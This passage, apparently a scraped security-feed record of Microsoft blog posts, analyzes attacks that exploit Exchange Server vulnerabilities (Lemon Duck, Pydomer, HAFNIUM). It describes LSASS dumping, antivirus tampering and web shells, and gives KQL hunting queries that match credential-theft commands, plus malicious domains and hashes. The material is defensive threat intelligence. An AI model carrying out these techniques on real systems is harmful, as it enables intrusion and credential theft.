attacks. While still maintaining their normal email-based campaigns, the Lemon Duck operators compromised numerous Exchange servers and moved in the direction of being more of a malware loader than a simple miner.\n\nUsing a form of the attack that allows direct execution of commands versus dropping a web shell, the Lemon Duck operators ran standard Invoke Expression commands to download a payload. Having used the same C2 and download servers for some time, the operators applied a varied degree of obfuscation to their commands on execution.\n\n\n\n_Fig 7. Example executions of Lemon Duck payload downloads_\n\nThe Lemon Duck payload is an encoded and obfuscated PowerShell script. It first removes various security products from the system, then creates scheduled tasks and WMI Event subscription for persistence. A second script is downloaded to attempt to evade Microsoft Defender Antivirus, abusing their administrative access to run the _Set-MPPreference_ command to disable real-time monitoring (a tactic that Microsoft Defender [Tamper protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) blocks) and add scanning exclusions for the C:\\ drive and the PowerShell process.\n\n\n\n\n\n_Figure 8. Lemon Duck payloads_\n\nOne randomly named scheduled task connects to a C2 every hour to download a new payload, which includes various lateral movement and credential theft tools. The operators were seen to download RATs and information stealers, including [Ramnit](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/Ramnit>) payloads.\n\n\n\n_Figure 9. Lemon Duck post-exploitation activities_\n\nIn some instances, the operators took advantage of having compromised mail servers to access mailboxes and send emails containing the Lemon Duck payload using various colorful email subjects.\n\n\n\n_Figure 10. Email subjects of possibly malicious emails_\n\n\n\n_Figure 11. Attachment variables_\n\nIn one notable example, the Lemon Duck operators compromised a system that already had _xx.bat_ and a web shell. After establishing persistence on the system in a non-web shell method, the Lemon Duck operators were observed cleaning up other attackers\u2019 presence on the system and mitigating the CVE-2021-26855 (SSRF) vulnerability using a legitimate cleanup script that they hosted on their own malicious server. This action prevents further exploitation of the server and removes web shells, giving Lemon Duck exclusive access to the compromised server. This stresses the need to fully investigate systems that were exposed, even if they have been fully patched and mitigated, per traditional incident response process.\n\n## Pydomer ransomware\n\nWhile DoejoCrypt was a new ransomware payload, the access gained by attackers via the on-premises Exchange Server vulnerabilities will likely become part of the complex cybercriminal economy where additional ransomware operators and affiliates take advantage of it. The first existing ransomware family to capitalize on the vulnerabilities was Pydomer. This ransomware family was previously seen using vulnerabilities in attacks, notably taking advantage of Pulse Secure VPN vulnerabilities, for which Pulse Secure has released security patches, to steal credentials and perform ransomware attacks.\n\nIn this campaign, the operators scanned and mass-compromised unpatched Exchange Servers to drop a web shell. They started later than some other attackers, with many compromises occurring between March 18 and March 20, a window when fewer unpatched systems were available. They then dropped a web shell, with a notable file name format: \u201cChack[Word][Country abbreviation]\u201d:\n\n\n\n_Figure 12. Example web shell names observed being used by the Pydomer attackers_\n\nThese web shells were observed on around 1,500 systems, not all of which moved to the ransomware stage. The attackers then used their web shell to dump a _test.bat_ batch file that performed a similar function in the attack chain to the _xx.bat_ of the DoejoCrypt operators and allowed them to perform a dump of the LSASS process.\n\n\n\n_Figure 13. Pydomer post-exploitation activities_\n\nThis access alone would be valuable to attackers for later attacks, similar to the credentials gained during their use of Pulse Secure VPN vulnerabilities. The highly privileged credentials gained from an Exchange system are likely to contain domain administrator accounts and service accounts with backup privileges, meaning these attackers could perform ransomware and exfiltration actions against the networks they compromised long after the Exchange Server is patched and even enter via different means.\n\nOn systems where the attackers did move to second-stage ransomware operations, they utilized a Python script compiled to an executable and the Python cryptography libraries to encrypt files. The attackers then executed a PowerShell script via their web shell that acts as a downloader and distribution mechanism for the ransomware.\n\n\n\n_Figure 14. __PowerShell downloader and spreader used to get the Pydomer payload_\n\nThe script fetches a payload from a site hosted on a domain generation algorithm (DGA) domain, and attempts to spread the payload throughout the network, first attempting to spread the payload over WMI using Invoke-WMIMethod to attempt to connect to systems, and falling back to PowerShell remoting with Enter-PSSession if that fails. The script is run within the context of the web shell, which in most instances is Local System, so this lateral movement strategy is unlikely to work except in organizations that are running highly insecure and unrecommended configurations like having computer objects in highly privileged groups.\n\nThe Pydomer ransomware is a Python script compiled to an executable and uses the Python cryptography libraries to encrypt files. The ransomware encrypts the files and appends a random extension, and then drops a ransom note named _decrypt_file.TxT_.\n\n\n\n_Figure 15. Pydomer __ransom note_\n\nInterestingly, the attackers seem to have deployed a non-encryption extortion strategy. Following well-known ransomware groups like Maze and Egregor which leaked data for pay, the Pydomer hackers dropped an alternative _readme.txt_ onto systems without encrypting files. This option might have been semi-automated on their part or a side effect of a failure in their encryption process, as some of the systems they accessed were test systems that showed no data exfiltration. The note should be taken seriously if encountered, as the attackers had full access to systems and were likely able to exfiltrate data.\n\n\n\n_Figure 16. Pydomer extortion readme.txt_\n\n## Credential theft, turf wars, and dogged persistence\n\nIf a server is not running in a least-privilege configuration, credential theft could provide a significant return on investment for an attacker beyond their initial access to email and data. Many organizations have backup agent software and scheduled tasks running on these systems with domain admin-level permissions. For these organizations, the attackers might be able to harvest highly privileged credentials without lateral movement, for example, using the COM services DLL as a living-off-the-land binary to perform a dump of the LSASS process:\n\n\n\n_Figure 17.__ Use of COM services DLL to dump LSASS process_\n\nThe number of observed credential theft attacks, combined with high privilege of accounts often given to Exchange servers, means that these attacks could continue to impact organizations that don\u2019t fully remediate after a compromise even after patches have been applied. While the observed ransomware attempts were small-scale or had errors, there is still the possibility of [more skillful groups](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) utilizing credentials gained in these attacks for later attacks.\n\nAttackers also used their access to perform extensive reconnaissance using built-in Exchange commandlets and _dsquery_ to exfiltrate information about network configurations, user information, and email assets.\n\nWhile Lemon Duck operators might have had the boldest method for removing other attackers from the systems they compromised, they were not the only attacker to do so. Others were observed cleaning up .aspx and .bat files to remove other attackers, and even rebuilding the WMI database by deleting .mof files and restarting the service. As the window on unpatched machines closes, attackers showed increased interest in maintaining the access to the systems they exploited. By utilizing "malwareless" persistence mechanisms like enabling RDP, installing Shadow IT tools, and adding new local administrator accounts, the attackers are hoping to evade incident response efforts that might focus exclusively on web shells, AV scans, and patching.\n\n## Defending against exploits and post-compromise activities\n\nAttackers exploit the on-premises Exchange Server vulnerabilities in combination to bypass authentication and gain the ability to write files and run malicious code. The best and most complete remediation for these vulnerabilities is to update to a supported Cumulative Update and to install all security updates. Comprehensive mitigation guidance can be found here: <https://aka.ms/ExchangeVulns>.\n\nAs seen in the post-exploitation attacks discussed in this blog, the paths that attackers can take after successfully exploiting the vulnerabilities are varied and wide-ranging. If you have determined or have reason to suspect that these threats are present on your network, here are immediate steps you can take:\n\n * Investigate exposed Exchange servers for compromise, regardless of their current patch status.\n * Look for web shells via our [guidance](<https://aka.ms/exchange-customer-guidance>) and run a full AV scan using the [Exchange On-Premises Mitigation Tool](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n * Investigate Local Users and Groups, even non-administrative users for changes, and ensure all users require a password for sign-in. New user account creations (represented by Event ID 4720) during the time the system was vulnerable might indicate a malicious user creation.\n * Reset and randomize local administrator passwords with a tool like [LAPS](<https://aka.ms/laps>) if you are not already doing so.\n * Look for changes to the RDP, firewall, WMI subscriptions, and Windows Remote Management (WinRM) configuration of the system that might have been configured by the attacker to allow persistence.\n * Look for Event ID 1102 to determine if attackers cleared event logs, an activity that attackers perform with _exe_ in an attempt to hide their tracks.\n * Look for new persistence mechanisms such as unexpected services, scheduled tasks, and startup items.\n * Look for Shadow IT tools that attackers might have installed for persistence, such as non-Microsoft RDP and remote access clients.\n * Check mailbox-level email forwarding settings (both _ForwardingAddress_ and _ForwardingSMTPAddress_ attributes), check mailbox inbox rules (which might be used to forward email externally), and check Exchange Transport rules that you might not recognize.\n\nWhile our response tools check for and remove known web shells and attack tools, performing a full investigation of these systems is recommended. For comprehensive investigation and mitigation guidance and tools, see <https://aka.ms/exchange-customer-guidance>.\n\nAdditionally, here are best practices for building credential hygiene and practicing the principle of least privilege:\n\n * Follow guidance to run Exchange in least-privilege configuration: <https://adsecurity.org/?p=4119>.\n * Ensure service accounts and scheduled tasks run with the least privileges they need. Avoid widely privileged groups like domain admins and backup operators and prefer accounts with access to just the systems they need.\n * Randomize local administrator passwords to prevent lateral movement with tools like [LAPS](<https://aka.ms/laps>).\n * Ensure administrators practice good administration habits like[ Privileged Admin Workstations](<https://docs.microsoft.com/en-us/security/compass/overview>).\n * Prevent privileged accounts like domain admins from signing into member servers and workstations using Group Policy to limit credential exposure and lateral movement.\n\n \n\n## Appendix\n\n### Microsoft Defender for Endpoint detection details\n\n**Antivirus **\n\nMicrosoft Defender Antivirus detects exploitation behavior with these detections:\n\n * Behavior:Win32/Exmann\n * [Behavior:Win32/IISExchgSpawnEMS](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgSpawnEMS.A&threatId=-2147212928>)\n * [Exploit:ASP/CVE-2021-27065](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:ASP/CVE-2021-27065>)\n * Exploit:Script/Exmann\n * Trojan:Win32/IISExchgSpawnCMD\n * [Behavior:Win32/IISExchgDropWebshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/IISExchgDropWebshell.B&threatId=-2147190469>)\n\nWeb shells are detected as:\n\n * [Backdoor:JS/Webshell](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/WebShell&threatId=-2147233581>)\n * [Backdoor:PHP/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:PHP/Chopper.B!dha&threatId=-2147231664>)\n * Backdoor:ASP/Chopper\n * Backdoor:MSIL/Chopper\n * [Trojan:JS/Chopper](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:JS/Chopper!dha&threatId=-2147232033>)\n * Trojan:Win32/Chopper\n * [Behavior:Win32/WebShellTerminal](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/WebShellTerminal.A&threatId=-2147213299>)\n\nRansomware payloads and associated files are detected as:\n\n * [Trojan:BAT/Wenam](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:BAT/Wenam.A&threatId=-2147188992>) - _xx.bat_ behaviors\n * [Ransom:Win32/DoejoCrypt](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/DoejoCrypt.A&threatId=-2147189904>) - DoejoCrypt ransomware\n * [Trojan:PowerShell/Redearps](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/Redearps.A&threatId=-2147189091>) - PowerShell spreader in Pydomer attacks\n * [Ransom:Win64/Pydomer](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win64/Pydomer.A&threatId=-2147189083>) - Pydomer ransomware\n\nLemon Duck malware is detected as:\n\n * [Trojan:PowerShell/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:PowerShell/LemonDuck.A&threatId=-2147189579>)\n * [Trojan:Win32/LemonDuck](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/LemonDuck.A&threatId=-2147189576>)\n\nSome of the credential theft techniques highlighted in this report are detected as:\n\n * [Behavior:Win32/DumpLsass](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/DumpLsass.A!attk&threatId=-2147237471>)\n * Behavior:Win32/RegistryExfil\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Suspicious w3wp.exe activity in Exchange\n * Possible exploitation of Exchange Server vulnerabilities\n * Possible IIS web shell\n * Possible web shell installation\n * Web shells associated with Exchange Server vulnerabilities\n * Network traffic associated with Exchange Server exploitation\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the DoejoCrypt and Pydomer ransomware campaign:\n\n * DoejoCrypt ransomware\n * Pydomer ransomware\n * Pydomer download site\n\nAlerts with the following titles in the security center can indicate threat activity on your network specific to the Lemon Duck botnet:\n\n * LemonDuck Malware\n * LemonDuck botnet C2 domain activity\n\nThe following behavioral alerts might also indicate threat activity associated with this threat:\n\n * Possible web shell installation\n * A suspicious web script was created\n * Suspicious processes indicative of a web shell\n * Suspicious file attribute change\n * Suspicious PowerShell command line\n * Possible IIS Web Shell\n * Process memory dump\n * A malicious PowerShell Cmdlet was invoked on the machine\n * WDigest configuration change\n * Sensitive information lookup\n * Suspicious registry export\n\n### Advanced hunting\n\nTo locate possible exploitation activities in Microsoft Defender for Endpoint, run the following queries.\n\n**Processes run by the IIS worker process**\n\nLook for processes executed by the IIS worker process\n\n`// Broadly search for processes executed by the IIS worker process. Further investigation should be performed on any devices where the created process is indicative of reconnaissance \nDeviceProcessEvents \n| where InitiatingProcessFileName == 'w3wp.exe' \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| where FileName !in~ (\"csc.exe\",\"cvtres.exe\",\"conhost.exe\",\"OleConverter.exe\",\"wermgr.exe\",\"WerFault.exe\",\"TranscodingService.exe\") \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nSearch for PowerShell spawned from the IIS worker process, observed most frequently in Lemon Duck with Base64 encoding to obfuscate C2 domains\n\n`DeviceProcessEvents \n| where FileName =~ \"powershell.exe\" \n| where InitiatingProcessFileName =~ \"w3wp.exe\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Tampering**\n\nSearch for Lemon Duck tampering with Microsoft Defender Antivirus\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Batch script actions **\n\nSearch for batch scripts performing credential theft, as observed in DoejoCrypt infections\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"C:\\Windows\\Temp\" \n| where ProcessCommandLine has \"reg save\" \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\nLook for evidence of batch script execution that leads to credential dumping\n\n`// Search for batch script execution, leading to credential dumping using rundll32 and the COM Services DLL, dsquery, and makecab use \nDeviceProcessEvents \n| where InitiatingProcessFileName =~ \"cmd.exe\" \n| where InitiatingProcessCommandLine has \".bat\" and InitiatingProcessCommandLine has @\"\\inetpub\\wwwroot\\aspnet_client\\\" \n| where InitiatingProcessParentFileName has \"w3wp\" \n| where FileName != \"conhost.exe\" \n| project FileName, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Suspicious files dropped under an aspnet_client folder**\n\nLook for dropped suspicious files like web shells and other components\n\n`// Search for suspicious files, including but not limited to batch scripts and web shells, dropped under the file path C:\\inetpub\\wwwroot\\aspnet_client\\ \nDeviceFileEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" \n| where FolderPath has \"\\\\aspnet_client\\\\\" \n| where InitiatingProcessCommandLine contains \"MSExchange\" \n| project FileName, FolderPath, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Checking for persistence on systems that have been suspected as compromised**\n\nSearch for creations of new local accounts\n\n`DeviceProcessEvents \n| where FileName == \"net.exe\" \n| where ProcessCommandLine has_all (\"user\", \"add\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Search for installation events that were used to download ScreenConnect for persistence **\n\nNote that this query may be noisy and is not necessarily indicative of malicious activity alone.\n\n`DeviceProcessEvents \n| where FileName =~ \"msiexec.exe\" \n| where ProcessCommandLine has @\"C:\\Windows\\Temp\\\" \n| parse-where kind=regex flags=i ProcessCommandLine with @\"C:\\\\Windows\\\\Temp\\\\\" filename:string @\".msi\" \n| project filename, ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Hunting for credential theft **\n\nSearch for logon events related to services and scheduled tasks on devices that may be Exchange servers. The results of this query should be used to verify whether any of these users have privileged roles that might have enabled further persistence.\n\n`let devices = \nDeviceProcessEvents \n| where InitiatingProcessFileName == \"w3wp.exe\" and InitiatingProcessCommandLine contains \"MSExchange\" \n| distinct DeviceId; \n// \nDeviceLogonEvents \n| where DeviceId in (devices) \n| where LogonType in (\"Batch\", \"Service\") \n| project AccountName, AccountDomain, LogonType, DeviceId, Timestamp`\n\nSearch for WDigest registry key modification, which allows for the LSASS process to store plaintext passwords.\n\n`DeviceRegistryEvents \n| where RegistryValueName == \"UseLogonCredential\" \n| where RegistryKey has \"WDigest\" and RegistryValueData == \"1\" \n| project PreviousRegistryValueData, RegistryValueData, RegistryKey, RegistryValueName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for the COM services DLL being executed by rundll32, which can be used to dump LSASS memory.\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"rundll32.exe\", \"comsvcs.dll\") \n| project FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\nSearch for Security Account Manager (SAM) or SECURITY databases being saved, from which credentials can later be extracted.\n\n`DeviceProcessEvents \n| where FileName == \"reg.exe\" \n| where ProcessCommandLine has \"save\" and ProcessCommandLine has_any (\"hklm\\\\security\", \"hklm\\\\sam\") \n| project InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp`\n\n## Indicators\n\nSelected indicators from attacks are included here, the threats may utilize files and network indicators not represented here.\n\n**Files (SHA-256)**\n\nThe following are file hashes for some of the web shells observed during attacks:\n\n * 201e4e9910dcdc8c4ffad84b60b328978db8848d265c0b9ba8473cf65dcd0c41\n * 2f0bc81c2ea269643cae307239124d1b6479847867b1adfe9ae712a1d5ef135e\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 8e90ed33c7ee82c0b64078ea36ec95f7420ba435c693b3b3dd728b494abf7dfc\n * a291305f181e24fe7194154b4cd355ccb039d5765709c80999e392efec69c90a\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * dd29e8d47dde124c7d14e614e03ccaab3ecaa50e0a0bef985ed59e98928bc13d\n\nDoejoCrypt associated hashes:\n\n * 027119161d11ba87acc908a1d284b93a6bcafccc012e52ce390ecb9cd745bf27\n * 10bce0ff6597f347c3cca8363b7c81a8bff52d2ff81245cd1e66a6e11aeb25da\n * 2b9838da7edb0decd32b086e47a31e8f5733b5981ad8247a2f9508e232589bff\n * 904fbea2cd68383f32c5bc630d2227601dc52f94790fe7a6a7b6d44bfd904ff3\n * bf53b637683f9cbf92b0dd6c97742787adfbc12497811d458177fdeeae9ec748\n * e044d9f2d0f1260c3f4a543a1e67f33fcac265be114a1b135fd575b860d2b8c6\n * fdec933ca1dd1387d970eeea32ce5d1f87940dfb6a403ab5fc149813726cbd65\n * feb3e6d30ba573ba23f3bd1291ca173b7879706d1fe039c34d53a4fdcdf33ede\n\nLemon Duck associated hashes:\n\n * 0993cc228a74381773a3bb0aa36a736f5c41075fa3201bdef4215a8704e582fc\n * 3df23c003d62c35bd6da90df12826c1d3fdd94029bf52449ba3d89920110d5ec\n * 4f0b9c0482595eee6d9ece0705867b2aae9e4ff68210f32b7425caca763723b9\n * 56101ab0881a6a34513a949afb5a204cad06fd1034f37d6791f3ab31486ba56c\n * 69ce57932c3be3374e8843602df1c93e1af622fc53f3f1d9b0a75b66230a1e2e\n * 737752588f32e4c1d8d20231d7ec553a1bd4a0a090b06b2a1835efa08f9707c4\n * 893ddf0de722f345b675fd1ade93ee1de6f1cad034004f9165a696a4a4758c3e\n * 9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719\n * 9f2fe33b1c7230ec583d7f6ad3135abcc41b5330fa5b468b1c998380d20916cd\n * a70931ebb1ce4f4e7d331141ad9eba8f16f98da1b079021eeba875aff4aeaa85\n * d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09\n * db093418921aae00187ae5dc6ed141c83614e6a4ec33b7bd5262b7be0e9df2cd\n * dc612f5c0b115b5a13bdb9e86f89c5bfe232e5eb76a07c3c0a6d949f80af89fd\n * f517526fc57eb33edb832920b1678d52ad1c5cf9c707859551fe065727587501\n * f8d388f502403f63a95c9879c806e6799efff609001701eed409a8d33e55da2f\n * fbeefca700f84373509fd729579ad7ea0dabdfe25848f44b2fbf61bf7f909df0\n\nPydomer associated hashes:\n\n * 7e07b6addf2f0d26eb17f4a1be1cba11ca8779b0677cedc30dbebef77ccba382\n * 866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\n * 910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\n * a387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287\n * b9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f\n * c25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n * c4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908\n\n**Network indicators**\n\nDomains abused by Lemon Duck:\n\n * down[.]sqlnetcat[.]com\n * t[.]sqlnetcat[.]com\n * t[.]netcatkit[.]com\n\nPydomer DGA network indicators:\n\n * uiiuui[.]com/search/*\n * yuuuuu43[.]com/vpn-service/*\n * yuuuuu44[.]com/vpn-service/*\n * yuuuuu46[.]com/search/*\n\nThe post [Analyzing attacks taking advantage of the Exchange Server vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-25T21:21:07", "type": "mssecure", "title": "Analyzing attacks taking advantage of the Exchange Server vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-27065"], "modified": "2021-03-25T21:21:07", "id": "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "href": "https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-10T12:09:16", "description": "_**Update [03/08/2021]**: Microsoft continues to see multiple actors taking advantage of unpatched systems to attack organizations with on-premises Exchange Server. To aid defenders in investigating these attacks where Microsoft security products and tooling may not be deployed, we are releasing a feed of observed indicators of compromise (IOCs). The feed of malware hashes and known malicious file paths observed in related attacks is available in both JSON and CSV formats at the below GitHub links. This information is being shared as TLP:WHITE._\n\n * [CSV format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>)\n * [JSON format](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>)\n\n_**Update [03/05/2021]**: Microsoft sees increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM. To aid customers in investigating these attacks, __Microsoft Security Response Center (MSRC) has provided additional resources, including new mitigation guidance: [Microsoft Exchange Server Vulnerabilities Mitigations \u2013 March 2021](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>)_\n\n_**Update [03/04/2021]**: The Exchange Server team released a script for checking HAFNIUM indicators of compromise (IOCs). See Scan Exchange log files for indicators of compromise._\n\n \n\nMicrosoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to [HAFNIUM](<https://blogs.microsoft.com/on-the-issues/?p=64505>), a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.\n\nThe vulnerabilities recently being exploited were CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in today\u2019s [Microsoft Security Response Center (MSRC) release - Multiple Security Updates Released for Exchange Server](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>). We strongly urge customers to update on-premises systems immediately. Exchange Online is not affected.\n\nWe are sharing this information with our customers and the security community to emphasize the critical nature of these vulnerabilities and the importance of patching all affected systems immediately to protect against these exploits and prevent future abuse across the ecosystem. This blog also continues our mission to shine a light on malicious actors and elevate awareness of the sophisticated tactics and techniques used to target our customers. The related IOCs, [Azure Sentinel](<https://azure.microsoft.com/en-us/services/azure-sentinel/>) advanced hunting queries, and [Microsoft Defender for Endpoint](<https://www.microsoft.com/en-us/microsoft-365/security/endpoint-defender>) product detections and queries shared in this blog will help SOCs proactively hunt for related activity in their environments and elevate any alerts for remediation.\n\nMicrosoft would like to thank our industry colleagues at Volexity and Dubex for reporting different parts of the attack chain and their collaboration in the investigation. Volexity has also [published a blog post](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities>) with their analysis. It is this level of proactive communication and intelligence sharing that allows the community to come together to get ahead of attacks before they spread and improve security for all.\n\n## Who is HAFNIUM?\n\nHAFNIUM primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.\n\nHAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like [Covenant](<https://github.com/cobbr/Covenant>), for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like [MEGA](<https://mega.nz/>).\n\nIn campaigns unrelated to these vulnerabilities, Microsoft has observed HAFNIUM interacting with victim Office 365 tenants. While they are often unsuccessful in compromising customer accounts, this reconnaissance activity helps the adversary identify more details about their targets\u2019 environments.\n\nHAFNIUM operates primarily from leased virtual private servers (VPS) in the United States.\n\n## Technical details\n\nMicrosoft is providing the following details to help our customers understand the techniques used by HAFNIUM to exploit these vulnerabilities and enable more effective defense against any future attacks against unpatched systems.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange server.\n\n[CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n\n[CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n[CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is a post-authentication arbitrary file write vulnerability in Exchange. If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\n## Attack details\n\nAfter exploiting these vulnerabilities to gain initial access, HAFNIUM operators deployed web shells on the compromised server. Web shells potentially allow attackers to steal data and perform additional malicious actions that lead to further compromise. One example of a web shell deployed by HAFNIUM, written in ASP, is below:\n\n\n\nFollowing web shell deployment, HAFNIUM operators performed the following post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory:\n\n\n\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration:\n\n\n\n * Adding and using Exchange PowerShell snap-ins to export mailbox data:\n\n\n\n * Using the [Nishang](<https://github.com/samratashok/nishang>) 